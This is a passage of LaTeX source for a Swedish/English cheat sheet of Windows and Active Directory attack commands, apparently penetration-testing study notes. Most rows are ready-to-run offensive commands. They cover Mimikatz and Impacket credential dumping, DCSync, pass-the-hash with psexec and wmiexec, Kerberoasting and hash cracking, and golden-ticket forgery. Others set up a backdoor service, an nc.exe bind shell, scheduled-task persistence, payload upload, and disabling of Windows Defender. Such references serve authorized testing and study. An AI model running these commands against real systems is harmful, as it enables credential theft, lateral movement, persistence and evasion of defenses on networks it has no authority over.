\SetRowColor{white} {\bf{sekurlsa::logonpasswords}} & Dumpa hashar från minnet \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{token::whoami}} & Lista vem som k{\"o}r mimikatz (f{\"o}r att bekr{\"a}fta sin roll efter elevering) \tn % Row Count 13 (+ 4) % Row 5 \SetRowColor{white} {\bf{lsadump::sam}} & Dumpa SAM \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{lsadump::dcsync}} & AD-hashar \tn % Row Count 16 (+ 2) % Row 7 \SetRowColor{white} {\bf{load mimikatz}} & K{\"o}r via metasploit \tn % Row Count 18 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Impacket}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{SECRETSDUMP}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Dump password hashes}}} \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \seqsplit{impacket-secretsdump} & Dump NTLM hash (or use Mimikatz) \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} impacket-secretsdump -sam sam -system system -security security LOCAL & Retrieve passwords \tn % Row Count 8 (+ 4) % Row 4 \SetRowColor{LightBackground} secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL & Dump NTDS \tn % Row Count 11 (+ 3) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{SMBCLIENT}}} \tn % Row Count 12 (+ 1) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Explore, download and upload files using SMB}}} \tn % Row Count 13 (+ 1) % Row 7 \SetRowColor{white} pth-smbclient.py -hashes aad3b4... 
\seqsplit{EXAMPLE/administrator@10}.10.10.5 & Use NTLM hash at machine \tn % Row Count 17 (+ 4) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{PSEXEC}}} \tn % Row Count 18 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Execute commands by creating a service (noisy)}}} \tn % Row Count 19 (+ 1) % Row 10 \SetRowColor{LightBackground} impacket-psexec.py -hashes \seqsplit{:aad3b435b51404eeaad3b435b51404ee} \seqsplit{EXAMPLE/Administrator@192.168.1.10} & Use NTLM hash (pass-the-hash) -\textgreater{} Remote shell \tn % Row Count 24 (+ 5) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{WMIEXEC}}} \tn % Row Count 25 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Commands using WMI. (more silent than psexec) }}} \tn % Row Count 26 (+ 1) % Row 13 \SetRowColor{white} wmiexec.py \seqsplit{DOMAIN/user@10.0.0.5} -hashes :NTLMHASH & (PTH) Execute commands on remote computer \tn % Row Count 29 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{John the Ripper (JtR)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Commands}} \{\{bb=3\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} john hash.txt & Run john against hash.txt \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} john -{}-format=krb5tgs -{}-wordlist=rockyou.txt tgt\_hash.txt & Kerberoasting \tn % Row Count 6 (+ 3) % Row 3 \SetRowColor{white} john -{}-format=lm hash.txt & Crack LM-hash \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} john -{}-format=nt hash.txt & Crack NT-hash \tn % Row Count 10 (+ 2) % Row 5 \SetRowColor{white} john -{}-format=netntlm hash.txt & Crack NTLMv1/Net-NTLMv1 \seqsplit{(challenge/response)} \tn % Row Count 13 (+ 3) % Row 6 \SetRowColor{LightBackground} john -{}-format=netntlmv2 hash.txt & 
Crack NTLMv2/Net-NTLMv2 \seqsplit{(challenge/response)} \tn % Row Count 16 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Output/Misc}} \{\{bb=3\}\}} \tn % Row Count 17 (+ 1) % Row 8 \SetRowColor{LightBackground} john.pot & File with cracked passwords \tn % Row Count 19 (+ 2) % Row 9 \SetRowColor{white} john.rec & Stores john's current status \tn % Row Count 21 (+ 2) % Row 10 \SetRowColor{LightBackground} john -{}-restore & Picks up where it left off. Based on {\bf{john.rec}} \tn % Row Count 24 (+ 3) % Row 11 \SetRowColor{white} jumbo-package & Support for additional hash types. Separate package install. Use {\bf{-{}-rules=jumbo}} \tn % Row Count 29 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{WINDOWS}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{REGISTRY}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} SAM & NTLM passwords --- stores credentials and account information for local users. {\emph{username:RID:LM:NT.}} \tn % Row Count 7 (+ 6) % Row 2 \SetRowColor{LightBackground} Secrets & Stores recent cached login passwords of users. 
Stores secrets used by the Local Security Authority (LSA) \tn % Row Count 13 (+ 6) % Row 3 \SetRowColor{white} System & Stores system configuration data \tn % Row Count 15 (+ 2) % Row 4 \SetRowColor{LightBackground} Security & Stores user security policy data \tn % Row Count 17 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{PATHS}}} \tn % Row Count 18 (+ 1) % Row 6 \SetRowColor{LightBackground} HKEY\_LOCAL\_MACHINE\textbackslash{}SAM & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SAM \tn % Row Count 20 (+ 2) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{HKEY\_LOCAL\_MACHINE\textbackslash{}Security\textbackslash{}Policy\textbackslash{}Secrets} \tn % Row Count 21 (+ 1) % Row 8 \SetRowColor{LightBackground} HKEY\_LOCAL\_MACHINE\textbackslash{}SYSTEM & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SYSTEM \tn % Row Count 23 (+ 2) % Row 9 \SetRowColor{white} HKEY\_LOCAL\_MACHINE\textbackslash{}Security & C:\textbackslash{}Windows\textbackslash{}System32\textbackslash{}config\textbackslash{}SECURITY \tn % Row Count 25 (+ 2) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{LANMAN}}} \tn % Row Count 26 (+ 1) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Old! Converted to uppercase. No salt. Divided into 7 chars-block. Maximum 14 chars. 
DES.}}} \tn % Row Count 28 (+ 2) % Row 12 \SetRowColor{LightBackground} AAD3B435B51404EE & Hårdkodad LANMAN padding \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows (cont)}} \tn % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{MISC}}} \tn % Row Count 1 (+ 1) % Row 14 \SetRowColor{white} \seqsplit{Administrator:500:aad3b435b51404eeaad3b435b51404ee:cd06ca7c7e10c99b1d33b7485a2ed808:::} & Exempel på rad i SAM \tn % Row Count 6 (+ 5) % Row 15 \SetRowColor{LightBackground} NT AUTHORITY\textbackslash{}SYSTEM (S-1-5-18) & Gud på en helt lokal dator. Finns inte i AD. Ingen relation till andra SYSTEM på andra datorer \tn % Row Count 11 (+ 5) % Row 16 \SetRowColor{white} NT-Hash algoritm & MD4 \tn % Row Count 12 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberostermer}} \tn % Row 0 \SetRowColor{LightBackground} Domain Controller (DC) & Controls the AD \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} Key Distribution Center (KDC) & Service in the DC. User authenticates with user/pass. Distributes TGTs. \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} Authentication Service (AS) & Part of KDC. Authenticates the Kerberos client and grants a TGT \tn % Row Count 9 (+ 3) % Row 3 \SetRowColor{white} Ticket Granting Service (TGS) & Part of KDC. Validates the TGT. Issues an ST for a specific resource/service \tn % Row Count 13 (+ 4) % Row 4 \SetRowColor{LightBackground} Ticket Granting Ticket (TGT) & Proof of authentication. Given by KDC. 
Is then used to ask for an ST (at the TGS) \tn % Row Count 17 (+ 4) % Row 5 \SetRowColor{white} Service Tickets (ST) & Gives access to the requested resource/service \tn % Row Count 19 (+ 2) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ FLÖDE }}} \tn % Row Count 20 (+ 1) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{1. Anv{\"a}ndaren ber om en TGT} \tn % Row Count 21 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{2. Anv{\"a}ndaren loggar in och autentiseras av KDC.} \tn % Row Count 22 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{3. KDC utf{\"a}rdar en TGT till anv{\"a}ndaren.} \tn % Row Count 23 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{4. Anv{\"a}ndaren anv{\"a}nder TGT:n f{\"o}r att beg{\"a}ra servicebiljetter från TGS f{\"o}r de tj{\"a}nster de beh{\"o}ver åtkomst till.} \tn % Row Count 26 (+ 3) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{5. TGS verifierar TGT:n och utf{\"a}rdar servicebiljetten.} \tn % Row Count 28 (+ 2) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{6. Anv{\"a}ndaren anv{\"a}nder servicebiljetten f{\"o}r att autentisera mot tj{\"a}nsten.} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberostermer (cont)}} \tn % Row 13 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Misc}}} \tn % Row Count 1 (+ 1) % Row 14 \SetRowColor{white} NTDS.dit & Located at the Domain Controller. Stores NTLM hashes, Kerberos keys etc. 
\tn % Row Count 5 (+ 4) % Row 15 \SetRowColor{LightBackground} DOMAIN\textbackslash{}Administrator:500:aad3...:cd06...::: & Rad i NTDS.dit \tn % Row Count 8 (+ 3) % Row 16 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Service Principal Name (SPN)}}} \tn % Row Count 9 (+ 1) % Row 17 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Finns f{\"o}r varje tj{\"a}nst. KDC vet vilket konto varje SPN {\"a}r kopplat till}}} \tn % Row Count 11 (+ 2) % Row 18 \SetRowColor{white} MSSQLSvc/sqlserver.example.com:443 & Exempel på SPN \tn % Row Count 13 (+ 2) % Row 19 \SetRowColor{LightBackground} Servicekonto & AD-konto som k{\"o}r respektive tj{\"a}nst. Manuellt underhåll. \tn % Row Count 16 (+ 3) % Row 20 \SetRowColor{white} Managed Service Account (MSA) & AD-konto f{\"o}r s{\"a}ker och automatiserad tj{\"a}nstek{\"o}rning. Automatisk l{\"o}senordshantering. \tn % Row Count 21 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.6 cm} x{4.4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Kerberoasting}} \tn % Row 0 \SetRowColor{LightBackground} (1) Discover SPNs & e.g.\ with Impacket (GetUserSPNs.py), \seqsplit{PowerView(Get-DomainUser)} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} (2) Request service tickets & e.g.\ with Impacket \tn % Row Count 5 (+ 2) % Row 2 \SetRowColor{LightBackground} (3) Export service tickets & e.g.\ with Impacket -{}-\textgreater{} \$krb5tgs\$23\$*.... \tn % Row Count 7 (+ 2) % Row 3 \SetRowColor{white} (4) Crack service tickets. & e.g.\ 
with Hashcat \tn % Row Count 9 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ setspn }}} \tn % Row Count 10 (+ 1) % Row 5 \SetRowColor{white} {\bf{setspn -T lab.local -Q */* }} & List all SPNs in domain \tn % Row Count 12 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{SYSINTERNALS}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Övervaka processer, starta tj{\"a}nster, dumpa minne}}} \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{wmic ( Windows Management Instrumentation Command-line)}}} \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Samla systeminfo eller k{\"o}r kod tyst – lokalt eller fj{\"a}rr}}} \tn % Row Count 7 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{wmic \seqsplit{/node:"192.168.1.10"} process call create "cmd.exe /c whoami"}} & Starta kommando på fj{\"a}rrmaskin \tn % Row Count 11 (+ 4) % Row 5 \SetRowColor{white} {\bf{wmic \seqsplit{/node:targetA.hacker.lab} /user:hacker.lab\textbackslash{}admin /password:passw0rd get product name,vendor,version /format:csv }} & Lista alla installerad mjukvara med namn och version \tn % Row Count 17 (+ 6) % Row 6 \SetRowColor{LightBackground} {\bf{wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\textbackslash{}Windows\textbackslash{}\textbackslash{}" | findstr /i " "}} & Hitta tj{\"a}nster med os{\"a}kra s{\"o}kv{\"a}gar \tn % Row Count 24 (+ 7) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ SC (Service Control) }}} \tn % Row Count 25 (+ 1) % Row 8 \SetRowColor{LightBackground} 
\mymulticolumn{2}{x{8.4cm}}{{\emph{Skapa eller styra Windows-tj{\"a}nster f{\"o}r exekvering eller persistens}}} \tn % Row Count 27 (+ 2) % Row 9 \SetRowColor{white} {\bf{sc create backdoor binPath= "cmd.exe /k" start= auto}} & Skapa bakd{\"o}rrsservice \tn % Row Count 30 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 10 \SetRowColor{LightBackground} {\bf{sc create newservice binpath= "cmd.exe /k c:\textbackslash{}Windows\textbackslash{}Temp\textbackslash{}nc.exe -L -p 8080 -e cmd.exe"}} & Skapa lyssnare via nc genom persistent (/k) cmd \tn % Row Count 5 (+ 5) % Row 11 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{TASKLIST }}} \tn % Row Count 6 (+ 1) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visa alla aktiva processer}}} \tn % Row Count 7 (+ 1) % Row 13 \SetRowColor{white} {\bf{tasklist /v | findstr "svchost"}} & Hitta intressanta processer \tn % Row Count 9 (+ 2) % Row 14 \SetRowColor{LightBackground} {\bf{tasklist /fo csv /fi "username ne serviceacct"}} & Hitta processer som inte k{\"o}rs av {\emph{serviceacct. 
Spara till CSV}} \tn % Row Count 13 (+ 4) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ net }}} \tn % Row Count 14 (+ 1) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Hantera anv{\"a}ndare, grupper och resurser}}} \tn % Row Count 15 (+ 1) % Row 17 \SetRowColor{white} {\bf{net user bob passw0rd1234 /add}} & Add user \tn % Row Count 17 (+ 2) % Row 18 \SetRowColor{LightBackground} {\bf{net share}} & Lista alla delade mappar \tn % Row Count 19 (+ 2) % Row 19 \SetRowColor{white} {\bf{net use}} & Lista aktiva n{\"a}tverksanslutningar \tn % Row Count 21 (+ 2) % Row 20 \SetRowColor{LightBackground} {\bf{net accounts}} & Kontopolicy (l{\"o}senord, lockout etc) \tn % Row Count 23 (+ 2) % Row 21 \SetRowColor{white} {\bf{net localgroup administrators}}* & Lista alla administrat{\"o}rer (som finns i gruppen) \tn % Row Count 26 (+ 3) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ SCHTASKS }}} \tn % Row Count 27 (+ 1) % Row 23 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Skapa schemalagda tasks}}} \tn % Row Count 28 (+ 1) % Row 24 \SetRowColor{LightBackground} {\bf{schtasks /query /tn myshell}} & List task {\emph{myshell}} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 25 \SetRowColor{LightBackground} {\bf{schtasks /Create /tn myshell /tr C:\textbackslash{}users\textbackslash{}non\textbackslash{}shell.exe /sc MINUTE}} & Create task {\emph{myshell}}, path to program (/tr), every minute (/sc) \tn % Row Count 4 (+ 4) % Row 26 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{PSEXEC}}} \tn % Row Count 5 (+ 1) % Row 27 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Sysinternals som låter dig k{\"o}ra kommandon på en fj{\"a}rrdator. 
K{\"o}r ofta som SYSTEM}}} \tn % Row Count 7 (+ 2) % Row 28 \SetRowColor{white} {\bf{psexec \textbackslash{}\textbackslash{}192.168.1.100 cmd.exe}} & Starta kommando (skal) på fj{\"a}rrdator \tn % Row Count 9 (+ 2) % Row 29 \SetRowColor{LightBackground} {\bf{psexec \textbackslash{}\textbackslash{}target -u DOMAIN\textbackslash{}admin -p Password123 cmd.exe}} & Med user/pass \tn % Row Count 12 (+ 3) % Row 30 \SetRowColor{white} {\bf{psexec \textbackslash{}\textbackslash{}target cmd.exe /c "whoami \textgreater{} C:\textbackslash{}output.txt"}} & K{\"o}r kommando utan att {\"o}ppna skal \tn % Row Count 15 (+ 3) % Row 31 \SetRowColor{LightBackground} {\bf{psexec \textbackslash{}\textbackslash{}target -c revshell.exe }} & Ladda upp och k{\"o}r payload \tn % Row Count 17 (+ 2) % Row 32 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{ICACLS}}} \tn % Row Count 18 (+ 1) % Row 33 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visar och {\"a}ndrar beh{\"o}righeter på filer och mappar i Windows.}}} \tn % Row Count 20 (+ 2) % Row 34 \SetRowColor{white} {\bf{icacls C:\textbackslash{} | findstr BUILTIN\textbackslash{}Users}} & Hitta skrivbara mappar \tn % Row Count 22 (+ 2) % Row 35 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{ACCESSCHK }}} \tn % Row Count 23 (+ 1) % Row 36 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Visar vem som har vilka r{\"a}ttigheter till filer, mappar, tj{\"a}nster, registernycklar m.m.}}} \tn % Row Count 25 (+ 2) % Row 37 \SetRowColor{LightBackground} {\bf{accesschk.exe -d "C:\textbackslash{}Program Files\textbackslash{}MyApp"}} & Lista vilka anv{\"a}ndare som kan skriva till en mapp \tn % Row Count 28 (+ 3) % Row 38 \SetRowColor{white} {\bf{accesschk.exe -c * }} & Listar tj{\"a}nster och vem som kan starta/{\"a}ndra dessa \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} 
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Windows tools (cont)}} \tn % Row 39 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{WINRM }}} \tn % Row Count 1 (+ 1) % Row 40 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{Fj{\"a}rrstyrningsprotokoll som tillåter att kommandon k{\"o}rs på andra Windows-maskiner via n{\"a}tverket, ofta med PowerShell}}} \tn % Row Count 4 (+ 3) % Row 41 \SetRowColor{LightBackground} {\bf{\$s = New-PSSession -ComputerName \textless{}name\textgreater{} -Credential \textless{}lab\textbackslash{}netadmin\textgreater{}}} & Skapa session i \$s \tn % Row Count 8 (+ 4) % Row 42 \SetRowColor{white} {\bf{Invoke-Command -ScriptBlock \{Get-NetIPAddress\} -Session \$s}} & K{\"o}r Get-NetIPAddress på fj{\"a}rrdatorn via session \$s \tn % Row Count 12 (+ 4) % Row 43 \SetRowColor{LightBackground} {\bf{Enable-PSRemoting}} & Starta WinRM \tn % Row Count 14 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.2 cm} x{2.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Autentisera till en tj{\"a}nst direkt med NTLM-hash, utan att k{\"a}nna till l{\"o}senordet.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\emph{sekurlsa::pth /user:Administrator /domain:LAB \seqsplit{/ntlm:cd06ca7c7e10c99b1d33b7485a2ed808} /run:cmd.exe}} & PTH \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} Metasploit expects the format LMHASH:NTHASH. & E.g.\ 
when using SMBPass \tn % Row Count 8 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{6.56 cm} p{1.44 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{OVERPASS-THE-HASH}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Anv{\"a}nd NTLM-hashen f{\"o}r att skapa en Kerberos TGT → sedan autentisera via Kerberos.} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\emph{kerberos::purge }} & OPtH \tn % Row Count 3 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{sekurlsa::pth /user:admin /domain:test.local \seqsplit{/ntlm:cd06ca7c7e10c99b1d33b7485a2ed808} /run:cmd.exe}}} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.52 cm} x{4.48 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Golden Ticket}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{En f{\"o}rfalskad Kerberos TGT som skapas med }}krbtgt{\emph{-hashen och ger fullst{\"a}ndig, obehindrad access i en dom{\"a}n — utan att fråga dom{\"a}nkontrollanten. TGT:n kan vara valid i 10 år. Kr{\"a}ver admin.}}} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} {\bf{lsadump::dcsync /user:krbtgt}} & H{\"a}mta {\bf{krbtgt}}-kontots NTLM-hash via Mimikatz (kr{\"a}ver dom{\"a}nadmin) \tn % Row Count 8 (+ 4) % Row 2 \SetRowColor{LightBackground} {\bf{kerberos::golden}} & Skapa golden-ticket med Mimikatz \tn % Row Count 10 (+ 2) % Row 3 \SetRowColor{white} {\bf{krbtgt}} & Domain account signing all requests for TGTs \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} DCSync & Attack d{\"a}r man imiterar en DC och ber AD om l{\"o}senordshashar via replikering. 
\tn % Row Count 16 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{To create a Golden Ticket with Mimikatz: valid user ID, domain SID, domain name, krbtgt hash, any username \newline \newline {\bf{kerberos::golden /user:SuperHacker /ID:500, /sid: \seqsplit{S-1-5-21-1326731835-146056860-2877405472} /krbtgt:\textless{}NTLM hash of krbtgt account\textgreater{} /domain:HACKEDLAB.local}}} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.04 cm} x{4.96 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{CMD}} \tn % Row 0 \SetRowColor{LightBackground} /c & Run and close window \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} /k & Run and keep window open \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} /q & Quiet mode \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} /d & Disable autorun \tn % Row Count 4 (+ 1) % Row 4 \SetRowColor{LightBackground} /s & Quote friendly mode \tn % Row Count 5 (+ 1) % Row 5 \SetRowColor{white} cmd.exe /k color 0a & Start window with green color, and keep it open \tn % Row Count 7 (+ 2) % Row 6 \SetRowColor{LightBackground} type & Som cat, fast i cmd \tn % Row Count 8 (+ 1) % Row 7 \SetRowColor{white} nslookup \seqsplit{www.example.com} & Forward lookup \tn % Row Count 10 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Powershell}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{Execution Policy \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{powershell.exe -ExecutionPolicy Bypass -File script.ps1}} & Temor{\"a}r bypass av Execution Policy \tn % Row Count 4 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{Get-ExecutionPolicy}} & H{\"a}mta policyn \tn % Row Count 
6 (+ 2) % Row 3 \SetRowColor{white} Restricted & Inga script får k{\"o}ras \tn % Row Count 8 (+ 2) % Row 4 \SetRowColor{LightBackground} RemoteSigned & Lokala skript OK. Fj{\"a}rr måste vara signerade \tn % Row Count 11 (+ 3) % Row 5 \SetRowColor{white} Bypass & K{\"o}r allt utan att fråga \tn % Row Count 13 (+ 2) % Row 6 \SetRowColor{LightBackground} Unrestricted & K{\"o}r allt. Kommer få varning om skript {\"a}r från internet. \tn % Row Count 16 (+ 3) % Row 7 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{MISC}}} \tn % Row Count 17 (+ 1) % Row 8 \SetRowColor{LightBackground} Get-ChildItem -Recurse -Path C:\textbackslash{} -Filter "{\emph{pass}}xlsx" & Hitta fil som innehåller {\emph{pass}} och filtyp xlsx \tn % Row Count 20 (+ 3) % Row 9 \SetRowColor{white} Set-MpPreference \seqsplit{-DisableRealtimeMonitoring} \$true & Disable Windows Defender (real-time monitoring) \tn % Row Count 23 (+ 3) % Row 10 \SetRowColor{LightBackground} Add-MpPreference -ExclusionPath "Y:\textbackslash{}IT\textbackslash{}Security" & To ensure that the specified folder is not scanned by Windows Defender \tn % Row Count 27 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} 